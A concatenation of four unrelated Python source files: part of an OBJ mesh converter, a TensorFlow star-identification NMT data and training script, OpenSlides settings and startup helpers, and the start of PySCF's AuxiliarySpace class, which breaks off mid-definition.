# d unsigned int 4
# --------------------
# m unsigned short 2
dump_vertices4_to_buffer(sfaces['quads_flat'], buffer)
dump_materials_to_buffer(sfaces['quads_flat'], buffer)
add_padding(buffer, nquad_flat * 2)
# 9. smooth quads (vertices + materials + normals)
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# --------------------
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# nd unsigned int 4
# --------------------
# m unsigned short 2
dump_vertices4_to_buffer(sfaces['quads_smooth'], buffer)
dump_normals4_to_buffer(sfaces['quads_smooth'], buffer)
dump_materials_to_buffer(sfaces['quads_smooth'], buffer)
add_padding(buffer, nquad_smooth * 2)
# 10. flat quads uv (vertices + materials + uvs)
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# --------------------
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
# ud unsigned int 4
# --------------------
# m unsigned short 2
dump_vertices4_to_buffer(sfaces['quads_flat_uv'], buffer)
dump_uvs4_to_buffer(sfaces['quads_flat_uv'], buffer)
dump_materials_to_buffer(sfaces['quads_flat_uv'], buffer)
add_padding(buffer, nquad_flat_uv * 2)
# 11. smooth quads uv
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# --------------------
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# nd unsigned int 4
# --------------------
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
# ud unsigned int 4
# --------------------
# m unsigned short 2
dump_vertices4_to_buffer(sfaces['quads_smooth_uv'], buffer)
dump_normals4_to_buffer(sfaces['quads_smooth_uv'], buffer)
dump_uvs4_to_buffer(sfaces['quads_smooth_uv'], buffer)
dump_materials_to_buffer(sfaces['quads_smooth_uv'], buffer)
add_padding(buffer, nquad_smooth_uv * 2)
path = os.path.dirname(outfile)
fname = os.path.join(path, binfile)
out = open(fname, "wb")
out.write("".join(buffer))
out.close()
# #############################################################################
# Helpers
# #############################################################################
def usage():
print "Usage: %s -i filename.obj -o filename.js [-m morphfiles*.obj] [-c morphcolors*.obj] [-a center|top|bottom] [-s flat|smooth] [-t binary|ascii] [-d invert|normal]" % os.path.basename(sys.argv[0])
# #####################################################
# Main
# #####################################################
if __name__ == "__main__":
# get parameters from the command line
try:
opts, args = getopt.getopt(sys.argv[1:], "hbi:m:c:b:o:a:s:t:d:x:f:", ["help", "bakecolors", "input=", "morphs=", "colors=", "output=", "align=", "shading=", "type=", "dissolve=", "truncatescale=", "framestep="])
except getopt.GetoptError:
usage()
sys.exit(2)
infile = outfile = ""
morphfiles = ""
colorfiles = ""
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-i", "--input"):
infile = a
elif o in ("-m", "--morphs"):
morphfiles = a
elif o in ("-c", "--colors"):
colorfiles = a
elif o in ("-o", "--output"):
outfile = a
elif o in ("-a", "--align"):
if a in ("top", "bottom", "center", "centerxz", "none"):
ALIGN = a
elif o in ("-s", "--shading"):
if a in ("flat", "smooth"):
SHADING = a
elif o in ("-t", "--type"):
if a in ("binary", "ascii"):
TYPE = a
elif o in ("-d", "--dissolve"):
if a in ("normal", "invert"):
TRANSPARENCY = a
elif o in ("-b", "--bakecolors"):
BAKE_COLORS = True
elif o in ("-x", "--truncatescale"):
TRUNCATE = True
SCALE = float(a)
elif o in ("-f", "--framestep"):
FRAMESTEP = int(a)
if infile == "" or outfile == "":
usage()
sys.exit(2)
print "Converting [%s] into [%s] ..." % (infile, outfile)
if morphfiles:
print "Morphs [%s]" % morphfiles
if colorfiles:
print "Colors [%s]" % colorfiles
if TYPE == "ascii":
convert_ascii(infile, morphfiles, colorfiles, outfile)
elif TYPE == "binary":
convert_binary(infile, outfile)
| |
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import math, os
import libstarid
ls = libstarid.libstarid()
ls.read_sky('../data/sky')
dirdata = '../data/'
class Vocabulary:
def __init__(self):
self.starndxs = []
self.geom = {}
self.ids = {}
self.geom['<unk>'] = 1000
self.geom['<s>'] = 1000
self.geom['</s>'] = 1000
self.ids['<unk>'] = 1000
self.ids['<s>'] = 1000
self.ids['</s>'] = 1000
def update(self, sentences, starndx):
self.starndxs.append([starndx, len(sentences)]) # number of unique sentences for this star
for key, value in sentences.items():
geom = value[1].split(' ')
for word in geom:
if word not in self.geom:
self.geom[word] = 1
else:
self.geom[word] += 1
ids = value[2].split(' ')
for word in ids:
if word not in self.ids:
self.ids[word] = 1
else:
self.ids[word] += 1
def write_files(self, path):
with open(path + 'vocab.geom', 'w') as fout:
for key in self.geom.keys():
fout.write('%s\n' % key)
with open(path + 'vocab.ids', 'w') as fout:
for key in self.ids.keys():
fout.write('%s\n' % key)
def diststr(x):
return str(math.ceil(x / .1))
class Starimg:
def __init__(self, starndx, info):
self.starndx = starndx # starndx of target star
self.info = info
# use info to generate a 28 by 28 image pixel matrix
self.image = np.zeros((28,28))
for rowndx in range(len(self.info)):
self.image[int(self.info[rowndx, 0]), int(self.info[rowndx, 1])] = 1.0
# starlist is for info ready for writing nouns, verbs, and sentences
self.starlist = []
# self.starlist.append([int(self.starndx), 0., 0., 0.])
# todo check pixels are unique within starlist
for row in self.info:
starndx = int(row[2])
x = row[1] - 13.5
y = 13.5 - row[0]
r = math.ceil(math.sqrt(x**2 + y**2) * 100.) / 100.
self.starlist.append([starndx, int(row[0]), int(row[1]), x, y, r])
self.starlist = sorted(self.starlist, key=lambda x: x[5]) # sorted(self.starlist, key = lambda x: (x[3], x[0])
if len(self.starlist) < 6: # too few stars
self.lang = None
return
self.lang = Lang1(self.starlist, self.starndx)
def plot_image(self):
plt.matshow(-1 * self.image, cmap='Greys', interpolation='nearest')
plt.show()
def print_starlist(self):
import pprint
pprint.pprint(self.starlist)
class Lang1:
def __init__(self, starlist, starndx):
self.noun0g = 'n:na'
self.noun0i = 'n:' + str(starndx)
self.noun1 = self.Noun(starlist[0:3])
self.noun2 = self.Noun(starlist[3:6])
self.verb1 = self.Verb(self.noun1)
self.verb2 = self.Verb(self.noun1, self.noun2)
self.sentence_geom = self.noun1.geom + ' ' + self.verb1.geom + ' ' + self.noun0g + ' , ' \
+ self.verb2.geom + ' ' + self.noun2.geom + ' .'
self.sentence_ids = self.noun1.ids + ' ' + self.verb1.ids + ' ' + self.noun0i + ' , ' \
+ self.verb2.ids + ' ' + self.noun2.ids + ' .'
class Verb:
def __init__(self, nouna, nounb=None):
xa = [nouna.sides[0][5], nouna.sides[1][5], nouna.sides[2][5]]
ya = [nouna.sides[0][6], nouna.sides[1][6], nouna.sides[2][6]]
xb = [0., 0., 0.]
yb = [0., 0., 0.]
if nounb:
xb = [nounb.sides[0][5], nounb.sides[1][5], nounb.sides[2][5]]
yb = [nounb.sides[0][6], nounb.sides[1][6], nounb.sides[2][6]]
d0 = math.sqrt((xa[0] - xb[0]) ** 2 + (ya[0] - yb[0]) ** 2)
d1 = math.sqrt((xa[1] - xb[1]) ** 2 + (ya[1] - yb[1]) ** 2)
d2 = math.sqrt((xa[2] - xb[2]) ** 2 + (ya[2] - yb[2]) ** 2)
self.geom = 'v:' + diststr(d0) + ':' + diststr(d1) + ':' + diststr(d2)
self.ids = self.geom
class Noun:
def __init__(self, stars):
self.stars = stars # star input for just this noun, three stars
id = [self.stars[0][0], self.stars[1][0], self.stars[2][0]]
x = [self.stars[0][3], self.stars[1][3], self.stars[2][3]]
y = [self.stars[0][4], self.stars[1][4], self.stars[2][4]]
side01 = math.sqrt((x[0] - x[1])**2 + (y[0] - y[1])**2)
side12 = math.sqrt((x[1] - x[2])**2 + (y[1] - y[2])**2)
side20 = math.sqrt((x[2] - x[0])**2 + (y[2] - y[0])**2)
sides = [
[0, 1, id[0], id[1], side01, x[0], y[0], x[1], y[1]],
[1, 2, id[1], id[2], side12, x[1], y[1], x[2], y[2]],
[2, 0, id[2], id[0], side20, x[2], y[2], x[0], y[0]]]
sides = sorted(sides, key=lambda side: (side[4], side[0])) # increasing side length
sideab = sides[0][4]
sidebc = sides[1][4]
sideca = sides[2][4]
if (sides[0][0] == 0 and sides[1][0] == 1) \
or (sides[0][0] == 1 and sides[1][0] == 2) \
or (sides[0][0] == 2 and sides[1][0] == 0):
stara = str(sides[0][2])
starb = str(sides[0][3])
starc = str(sides[1][3])
else:
stara = str(sides[0][3])
starb = str(sides[0][2])
starc = str(sides[1][2])
self.sides = sides
self.geom = 'n:' + diststr(sideab) + ':' + diststr(sidebc) + ':' + diststr(sideca)
self.ids = 'n:' + stara + ':' + starb + ':' + starc
def generate_sentences_for_star(starndx, numsentences, verbose=False):
sentences = {}
for cnt in range(numsentences):
outdict = ls.image_generator(starndx)
starimg = Starimg(starndx=starndx, info=outdict['info'])
if not starimg.lang: # too few stars
continue
keytxt = starimg.lang.sentence_geom + ' : ' + starimg.lang.sentence_ids
if keytxt not in sentences:
sentences[keytxt] = [1, starimg.lang.sentence_geom, starimg.lang.sentence_ids]
else:
sentences[keytxt][0] += 1
if verbose:
print(sorted(sentences.values(), key=lambda x: -x[0]))
return sentences
def create_vocabulary_files(path):
vocabulary = Vocabulary()
for starndx in range(11): # starndx 4 has less than six stars, so include starndx 10
sentences = generate_sentences_for_star(starndx=starndx, numsentences=1000)
vocabulary.update(sentences=sentences, starndx=starndx)
print(vocabulary.starndxs) # sentences per starndx
vocabulary.write_files(path=dirdata)
def create_sentence_files(path, prefix, sentences_per_itr, numitrs):
fgeom = open(path + prefix + '.geom', 'w')
fids = open(path + prefix + '.ids', 'w')
for itr in range(numitrs):
for starndx in range(11): # starndx 4 has less than six stars, so include starndx 10
sentences = generate_sentences_for_star(starndx=starndx, numsentences=sentences_per_itr)
for key, value in sentences.items():
fgeom.write('%s\n' % value[1])
fids.write('%s\n' % value[2])
fgeom.close()
fids.close()
from nmt import model as nmt_model
from nmt import model_helper
from nmt import train
from nmt import inference
from nmt.utils import misc_utils as utils
from nmt.utils import vocab_utils
global hparams
dirdata = '../data/'
hparams = tf.contrib.training.HParams(
src='geom',
tgt='ids',
dev_prefix=dirdata+'test1',
test_prefix=dirdata+'test2',
vocab_prefix=dirdata+'vocab',
train_prefix=dirdata+'train',
out_dir=dirdata+'nmt_model',
num_units=128,
num_layers=2,
dropout=0.2,
unit_type='lstm',
encoder_type='uni',
residual=False,
num_residual_layers=0,
time_major=True,
num_embeddings_partitions=0,
attention='',
attention_architecture='standard',
pass_hidden_state=True,
optimizer='sgd',
num_train_steps=100,
batch_size=128,
init_op='uniform',
init_weight=0.1,
max_gradient_norm=5.0,
learning_rate=1.0,
warmup_steps=0,
warmup_scheme='t2t',
start_decay_step=0,
decay_factor=1.0,
decay_steps=10000,
learning_rate_decay_scheme='',
colocate_gradients_with_ops=True,
num_buckets=5,
max_train=0,
src_max_len=50,
tgt_max_len=50,
src_max_len_infer=False,
tgt_max_len_infer=False,
source_reverse=True,
infer_batch_size=32,
beam_width=0,
length_penalty_weight=0.0,
num_translations_per_input=1,
sos='<s>',
eos='</s>',
subword_option='',
check_special_token=True,
share_vocab=False,
forget_bias=1.0,
num_gpus=1,
epoch_step=0,
steps_per_stats=100,
steps_per_external_eval=None,
metrics=['bleu'],
log_device_placement=False,
random_seed=None,
override_loaded_hparams=False,
use_char_encode=False,
num_sampled_softmax=0,
num_encoder_layers=4,
num_decoder_layers=4,
num_enc_emb_partitions=0,
num_dec_emb_partitions=0,
src_embed_file=None,
tgt_embed_file=None,
language_model=False,
decay_scheme=None,
num_keep_ckpts=0,
)
src_vocab_file = hparams.vocab_prefix + '.' + hparams.src
tgt_vocab_file = hparams.vocab_prefix + '.' + hparams.tgt
src_vocab_size, src_vocab_file = vocab_utils.check_vocab(
src_vocab_file,
hparams.out_dir,
check_special_token=hparams.check_special_token,
sos=hparams.sos,
eos=hparams.eos,
unk=vocab_utils.UNK)
tgt_vocab_size, tgt_vocab_file = vocab_utils.check_vocab(
tgt_vocab_file,
hparams.out_dir,
check_special_token=hparams.check_special_token,
sos=hparams.sos,
eos=hparams.eos,
unk=vocab_utils.UNK)
hparams.add_hparam("src_vocab_size", src_vocab_size)
hparams.add_hparam("tgt_vocab_size", tgt_vocab_size)
hparams.add_hparam("src_vocab_file", src_vocab_file)
hparams.add_hparam("tgt_vocab_file", tgt_vocab_file)
def train_minimalist():
model_creator = nmt_model.Model
train_model = model_helper.create_train_model(model_creator, hparams)
train_sess = tf.Session(config=utils.get_config_proto(log_device_placement=hparams.log_device_placement), graph=train_model.graph)
with train_model.graph.as_default():
loaded_train_model, global_step = model_helper.create_or_load_model(train_model.model, hparams.out_dir, train_sess, 'train')
summary_writer = tf.summary.FileWriter(os.path.join(hparams.out_dir, 'train_log'), train_model.graph)
train_sess.run(train_model.iterator.initializer, feed_dict={train_model.skip_count_placeholder: (hparams.batch_size * hparams.epoch_step)})
global_step = 0
while global_step < hparams.num_train_steps:
try:
#(_, step_loss, step_predict_count, step_summary, global_step, step_word_count, batch_size) = loaded_train_model.train(train_sess)
output = loaded_train_model.train(train_sess)
global_step += 1
except tf.errors.OutOfRangeError:
utils.print_out('# epoch completed, step %d' % global_step)
train_sess.run(train_model.iterator.initializer, feed_dict={train_model.skip_count_placeholder: 0})
continue
#summary_writer.add_summary(step_summary, global_step)
loaded_train_model.saver.save(train_sess, os.path.join(hparams.out_dir, 'checkpoint.ckpt'), global_step=global_step)
summary_writer.close()
def eval_minimalist():
model_creator = nmt_model.Model
train_model = model_helper.create_train_model(model_creator, hparams)
eval_model = model_helper.create_eval_model(model_creator, hparams)
train_sess = tf.Session(config=utils.get_config_proto(log_device_placement=hparams.log_device_placement), graph=train_model.graph)
eval_sess = tf.Session(config=utils.get_config_proto(log_device_placement=hparams.log_device_placement), graph=eval_model.graph)
with train_model.graph.as_default():
loaded_train_model, global_step = model_helper.create_or_load_model(train_model.model, hparams.out_dir, train_sess, 'train')
summary_writer = tf.summary.FileWriter(os.path.join(hparams.out_dir, 'train_log'), train_model.graph)
train_sess.run(train_model.iterator.initializer, feed_dict={train_model.skip_count_placeholder: (hparams.batch_size * hparams.epoch_step)})
train.run_internal_eval(eval_model, eval_sess, hparams.out_dir, hparams, summary_writer)
global_step = 0
while global_step < hparams.num_train_steps:
try:
(_, step_loss, step_predict_count, step_summary, global_step, step_word_count, batch_size) = loaded_train_model.train(train_sess)
global_step += 1
except tf.errors.OutOfRangeError:
utils.print_out('# epoch completed, step %d' % global_step)
train_sess.run(train_model.iterator.initializer, feed_dict={train_model.skip_count_placeholder: 0})
continue
train.run_internal_eval(eval_model, eval_sess, hparams.out_dir, hparams, summary_writer)
summary_writer.add_summary(step_summary, global_step)
loaded_train_model.saver.save(train_sess, os.path.join(hparams.out_dir, 'checkpoint.ckpt'), global_step=global_step)
summary_writer.close()
def infer_minimalist():
model_creator = nmt_model.Model
infer_model = model_helper.create_infer_model(model_creator, hparams)
dev_src_file = "%s.%s" % (hparams.dev_prefix, hparams.src)
dev_tgt_file = "%s.%s" % (hparams.dev_prefix, hparams.tgt)
sample_src_data = inference.load_data(dev_src_file)
sample_tgt_data = inference.load_data(dev_tgt_file)
infer_sess = tf.Session(config=utils.get_config_proto(log_device_placement=hparams.log_device_placement), graph=infer_model.graph)
with infer_model.graph.as_default():
loaded_infer_model, global_step = model_helper.create_or_load_model(infer_model.model, hparams.out_dir, infer_sess, 'infer')
infer_sess.run(infer_model.iterator.initializer, feed_dict={infer_model.src_placeholder: sample_src_data, infer_model.batch_size_placeholder: hparams.infer_batch_size})
summary_writer = tf.summary.FileWriter(os.path.join(hparams.out_dir, 'infer_log'), infer_model.graph)
train.run_sample_decode(infer_model, infer_sess, hparams.out_dir, hparams, summary_writer, sample_src_data, sample_tgt_data)
train.run_external_eval(infer_model, infer_sess, hparams.out_dir, hparams, summary_writer)
summary_writer.close()
if __name__ == '__main__':
if not tf.gfile.Exists(dirdata): tf.gfile.MakeDirs(dirdata)
create_vocabulary_files(dirdata)
create_sentence_files(path=dirdata, prefix='train', sentences_per_itr=100, numitrs=10)
create_sentence_files(path=dirdata, prefix='test1', sentences_per_itr=100, numitrs=10)
create_sentence_files(path=dirdata, prefix='test2', sentences_per_itr=100, numitrs=10)
if not tf.gfile.Exists(hparams.out_dir): tf.gfile.MakeDirs(hparams.out_dir)
#train_minimalist()
# eval_minimalist()
# infer_minimalist()
| |
import argparse
import ctypes
import os
import sys
import tempfile
import threading
import time
import webbrowser
from typing import Dict, Optional
from django.conf import ENVIRONMENT_VARIABLE
from django.core.exceptions import ImproperlyConfigured
from django.utils.crypto import get_random_string
from mypy_extensions import NoReturn
DEVELOPMENT_VERSION = "Development Version"
UNIX_VERSION = "Unix Version"
WINDOWS_VERSION = "Windows Version"
WINDOWS_PORTABLE_VERSION = "Windows Portable Version"
class PortableDirNotWritable(Exception):
pass
class PortIsBlockedError(Exception):
pass
class DatabaseInSettingsError(Exception):
pass
class UnknownCommand(Exception):
pass
class ExceptionArgumentParser(argparse.ArgumentParser):
def error(self, message: str) -> NoReturn:
raise UnknownCommand(message)
def detect_openslides_type() -> str:
"""
Returns the type of this OpenSlides version.
"""
if sys.platform == "win32":
if os.path.basename(sys.executable).lower() == "openslides.exe":
# Note: sys.executable is the path of the *interpreter*
# the portable version embeds python so it *is* the interpreter.
# The wrappers generated by pip and co. will spawn the usual
# python(w).exe, so there is no danger of mistaking them
# for the portable even though they may also be called
# openslides.exe
openslides_type = WINDOWS_PORTABLE_VERSION
else:
openslides_type = WINDOWS_VERSION
else:
openslides_type = UNIX_VERSION
return openslides_type
def get_default_settings_dir(openslides_type: str = None) -> str:
"""
Returns the default settings path according to the OpenSlides type.
The argument 'openslides_type' has to be one of the three types mentioned in
openslides.utils.main.
"""
if openslides_type is None:
openslides_type = detect_openslides_type()
if openslides_type == UNIX_VERSION:
parent_directory = os.environ.get(
"XDG_CONFIG_HOME", os.path.expanduser("~/.config")
)
elif openslides_type == WINDOWS_VERSION:
parent_directory = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
parent_directory = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return os.path.join(parent_directory, "openslides")
def get_local_settings_dir() -> str:
"""
Returns the path to a local settings.
On Unix systems: 'personal_data/var/'
"""
return os.path.join("personal_data", "var")
def setup_django_settings_module(
settings_path: str = None, local_installation: bool = False
) -> None:
"""
Sets the environment variable ENVIRONMENT_VARIABLE, that means
'DJANGO_SETTINGS_MODULE', to the given settings.
If no settings_path is given and the environment variable is already set,
then this function does nothing.
If the argument settings_path is set, then the environment variable is
always overwritten.
"""
if settings_path is None and os.environ.get(ENVIRONMENT_VARIABLE, ""):
return
if settings_path is None:
if local_installation:
settings_dir = get_local_settings_dir()
else:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, "settings.py")
settings_file = os.path.basename(settings_path)
settings_module_name = ".".join(settings_file.split(".")[:-1])
if "." in settings_module_name:
raise ImproperlyConfigured(
"'.' is not an allowed character in the settings-file"
)
# Change the python path. Also set the environment variable python path, so
# change of the python path also works after a reload
settings_module_dir = os.path.abspath(os.path.dirname(settings_path))
sys.path.insert(0, settings_module_dir)
try:
os.environ["PYTHONPATH"] = os.pathsep.join(
(settings_module_dir, os.environ["PYTHONPATH"])
)
except KeyError:
# The environment variable is empty
os.environ["PYTHONPATH"] = settings_module_dir
# Set the environment variable to the settings module
os.environ[ENVIRONMENT_VARIABLE] = settings_module_name
def get_default_settings_context(user_data_dir: str = None) -> Dict[str, str]:
"""
Returns the default context values for the settings template:
'openslides_user_data_path', 'import_function' and 'debug'.
The argument 'user_data_path' is a given path for user specific data or None.
"""
# Setup path for user specific data (SQLite3 database, media, ...):
# Take it either from command line or get default path
default_context = {}
if user_data_dir:
default_context["openslides_user_data_dir"] = repr(user_data_dir)
default_context["import_function"] = ""
else:
openslides_type = detect_openslides_type()
if openslides_type == WINDOWS_PORTABLE_VERSION:
default_context[
"openslides_user_data_dir"
] = "get_win32_portable_user_data_dir()"
default_context[
"import_function"
] = "from openslides.utils.main import get_win32_portable_user_data_dir"
else:
data_dir = get_default_user_data_dir(openslides_type)
default_context["openslides_user_data_dir"] = repr(
os.path.join(data_dir, "openslides")
)
default_context["import_function"] = ""
default_context["debug"] = "False"
return default_context
def get_default_user_data_dir(openslides_type: str) -> str:
"""
Returns the default directory for user specific data according to the OpenSlides
type.
The argument 'openslides_type' has to be one of the three types mentioned
in openslides.utils.main.
"""
if openslides_type == UNIX_VERSION:
default_user_data_dir = os.environ.get(
"XDG_DATA_HOME", os.path.expanduser("~/.local/share")
)
elif openslides_type == WINDOWS_VERSION:
default_user_data_dir = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
default_user_data_dir = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return default_user_data_dir
def get_win32_app_data_dir() -> str:
"""
Returns the directory of Windows' AppData directory.
"""
shell32 = ctypes.WinDLL("shell32.dll") # type: ignore
SHGetFolderPath = shell32.SHGetFolderPathW
SHGetFolderPath.argtypes = (
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_void_p,
ctypes.c_uint32,
ctypes.c_wchar_p,
)
SHGetFolderPath.restype = ctypes.c_uint32
CSIDL_LOCAL_APPDATA = 0x001C
MAX_PATH = 260
buf = ctypes.create_unicode_buffer(MAX_PATH)
res = SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, 0, buf)
if res != 0:
# TODO: Write other exception
raise Exception("Could not determine Windows' APPDATA path")
return buf.value # type: ignore
def get_win32_portable_dir() -> str:
"""
Returns the directory of the Windows portable version.
"""
# NOTE: sys.executable will be the path to openslides.exe
# since it is essentially a small wrapper that embeds the
# python interpreter
portable_dir = os.path.dirname(os.path.abspath(sys.executable))
try:
fd, test_file = tempfile.mkstemp(dir=portable_dir)
except OSError:
raise PortableDirNotWritable(
"Portable directory is not writeable. "
"Please choose another directory for settings and data files."
)
else:
os.close(fd)
os.unlink(test_file)
return portable_dir
def get_win32_portable_user_data_dir() -> str:
"""
Returns the user data directory to the Windows portable version.
"""
return os.path.join(get_win32_portable_dir(), "openslides")
def write_settings(
settings_dir: str = None,
settings_filename: str = "settings.py",
template: str = None,
**context: str,
) -> str:
"""
Creates the settings file at the given dir using the given values for the
file template.
Retuns the path to the created settings.
"""
if settings_dir is None:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, settings_filename)
if template is None:
with open(
os.path.join(os.path.dirname(__file__), "settings.py.tpl")
) as template_file:
template = template_file.read()
# Create a random SECRET_KEY to put it in the settings.
# from django.core.management.commands.startproject
chars = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)"
context.setdefault("secret_key", get_random_string(50, chars))
for key, value in get_default_settings_context().items():
context.setdefault(key, value)
content = template % context
settings_module = os.path.realpath(settings_dir)
if not os.path.exists(settings_module):
os.makedirs(settings_module)
with open(settings_path, "w") as settings_file:
settings_file.write(content)
if context["openslides_user_data_dir"] == "get_win32_portable_user_data_dir()":
openslides_user_data_dir = get_win32_portable_user_data_dir()
else:
openslides_user_data_dir = context["openslides_user_data_dir"].strip("'")
os.makedirs(os.path.join(openslides_user_data_dir, "static"), exist_ok=True)
return os.path.realpath(settings_path)
def open_browser(host: str, port: int) -> None:
"""
Launches the default web browser at the given host and port and opens
the webinterface. Uses start_browser internally.
"""
if host == "0.0.0.0":
# Windows does not support 0.0.0.0, so use 'localhost' instead
start_browser(f"http://localhost:{port}")
else:
start_browser(f"http://{host}:{port}")
def start_browser(browser_url: str) -> None:
"""
Launches the default web browser at the given url and opens the
webinterface.
"""
try:
browser = webbrowser.get()
except webbrowser.Error:
print("Could not locate runnable browser: Skipping start")
else:
def function() -> None:
# TODO: Use a nonblocking sleep event here. Tornado has such features.
time.sleep(1)
browser.open(browser_url)
thread = threading.Thread(target=function)
thread.start()
def get_database_path_from_settings() -> Optional[str]:
"""
Retrieves the database path out of the settings file. Returns None,
if it is not a SQLite3 database.
Needed for the backupdb command.
"""
from django.conf import settings as django_settings
from django.db import DEFAULT_DB_ALIAS
db_settings = django_settings.DATABASES
default = db_settings.get(DEFAULT_DB_ALIAS)
if not default:
raise DatabaseInSettingsError("Default databases is not configured")
database_path = default.get("NAME")
if not database_path:
raise DatabaseInSettingsError("No path or name specified for default database.")
if default.get("ENGINE") != "django.db.backends.sqlite3":
database_path = None
return database_path
def is_local_installation() -> bool:
"""
Returns True if the command is called for a local installation
This is the case if manage.py is used, or when the --local-installation flag is set.
"""
return (
True
if "--local-installation" in sys.argv or "manage.py" in sys.argv[0]
else False
)
def is_windows() -> bool:
"""
Returns True if the current system is Windows. Returns False otherwise.
"""
return sys.platform == "win32"
| |
#xx Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Oliver Backhouse <olbackhouse@gmail.com>
# George Booth <george.booth@kcl.ac.uk>
#
'''
Auxiliary space class and helper functions.
'''
import time
import numpy as np
import scipy.linalg.blas
from pyscf import lib
from pyscf.lib import logger
from pyscf import __config__
from pyscf.lib.parameters import LARGE_DENOM
class AuxiliarySpace(object):
''' Simple container to hold the energies, couplings and chemical
potential associated with an auxiliary space.
Attributes:
energy : 1D array
Energies of the poles
coupling : 2D array
Coupling vector of the poles to each physical state
chempot : float
Chemical potental associated with the energies
'''
def __init__(self, energy, coupling, chempot=0.0):
self.energy = np.asarray(energy)
self.coupling = np.asarray(coupling, order='C')
self.chempot = chempot
self.sort()
def sort(self):
''' Sort in-place via the energies to make slicing easier.
'''
arg = np.argsort(self.energy)
self.energy = self.energy[arg]
self.coupling = self.coupling[:,arg]
def real_freq_spectrum(self, *args, **kwargs):
''' See subclasses.
'''
raise NotImplementedError
def compress(self, *args, **kwargs):
''' See subclasses.
'''
raise NotImplementedError
def get_occupied(self):
''' Returns a copy of the current AuxiliarySpace object
containing only the poles with energy less than the
chemical potential. The object should already be sorted.
Returns:
:class:`AuxiliarySpace` with only the occupied auxiliaries
'''
nocc = np.searchsorted(self.energy, self.chempot)
energy = np.copy(self.energy[:nocc])
coupling = np.copy(self.coupling[:,:nocc])
return self.__class__(energy, coupling, chempot=self.chempot)
def get_virtual(self):
''' Returns a copy of the current AuxiliarySpace object
containing only the poles with energy greater than the
chemical potential. The object should already be sorted.
Returns:
:class:`AuxiliarySpace` with only the virtual auxiliaries
'''
nocc = np.searchsorted(self.energy, self.chempot)
energy = np.copy(self.energy[nocc:])
coupling = np.copy(self.coupling[:,nocc:])
return self.__class__(energy, coupling, chempot=self.chempot)
def get_array(self, phys, out=None, chempot=0.0):
''' Expresses the auxiliaries as an array, i.e. the extended
Fock matrix in AGF2 or Hamiltonian of ADC(2).
Args:
phys : 2D array
Physical (1p + 1h) part of the matrix
Kwargs:
out : 2D array
If provided, use to store output
chempot : float
Scale energies (by default, :attr:`chempot` is not used
and energies retain their values). Default 0.0
Returns:
Array representing the coupling of the auxiliary space to
the physical space
'''
_check_phys_shape(self, phys)
dtype = np.result_type(phys.dtype, self.energy.dtype, self.coupling.dtype)
if out is None:
out = np.zeros((self.nphys+self.naux,)*2, dtype=dtype)
sp = slice(None, self.nphys)
sa = slice(self.nphys, None)
out[sp,sp] = phys
out[sp,sa] = self.coupling
out[sa,sp] = self.coupling.conj().T
out[sa,sa][np.diag_indices(self.naux)] = self.energy - chempot
return out
def dot(self, phys, vec, out=None, chempot=0.0):
''' Returns the dot product of :func:`get_array` with a vector.
Args:
phys : 2D array
Physical (1p + 1h) part of the matrix
vec : ndarray
Vector to compute dot product with
Kwargs:
out : 2D array
If provided, use to store output
chempot : float
Scale energies (by default, :attr:`chempot` is not used
and energies retain their values). Default 0.0
Returns:
ndarray with shape of :attr:`vec`
'''
_check_phys_shape(self, phys)
vec = np.asarray(vec)
input_shape = vec.shape
vec = vec.reshape((self.nphys+self.naux, -1))
dtype = np.result_type(self.coupling.dtype, vec.dtype)
sp = slice(None, self.nphys)
sa = slice(self.nphys, None)
if out is None:
out = np.zeros(vec.shape, dtype=dtype)
out = out.reshape(vec.shape)
out[sp] = np.dot(phys, vec[sp])
out[sp] += np.dot(self.coupling, vec[sa])
out[sa] = np.dot(vec[sp].T, self.coupling).conj().T
out[sa] += (self.energy[:,None] - chempot) * vec[sa]
out = out.reshape(input_shape)
return out
def eig(self, phys, out=None, chempot=0.0):
''' Computes the eigenvalues and eigenvectors of the array
returned by :func:`get_array`.
Args:
phys : 2D array
Physical (1p + 1h) part of the matrix
Kwargs:
out : 2D array
If provided, use to store output
chempot : float
Scale energies (by default, :attr:`chempot` is not used
and energies retain their values). Default 0.0
Returns:
tuple of ndarrays (eigenvalues, eigenvectors)
'''
_check_phys_shape(self, phys)
h = self.get_array(phys, chempot=chempot, out=out)
w, v = np.linalg.eigh(h)
return w, v
def moment(self, n, squeeze=True):
''' Builds the nth moment of the spectral distribution.
Args:
n : int or list of int
Moment(s) to compute
Kwargs:
squeeze : bool
If True, use :func:`np.squeeze` on output so that in
the case of :attr:`n` being an int, a 2D array is
returned. If False, output is always 3D. Default True.
Returns:
ndarray of moments
'''
n = np.asarray(n)
n = n.reshape(n.size)
energy_factored = self.energy[None] ** n[:,None]
v = self.coupling
moms = lib.einsum('xk,yk,nk->nxy', v, v.conj(), energy_factored)
if squeeze:
moms = np.squeeze(moms)
return moms
def remove_uncoupled(self, tol):
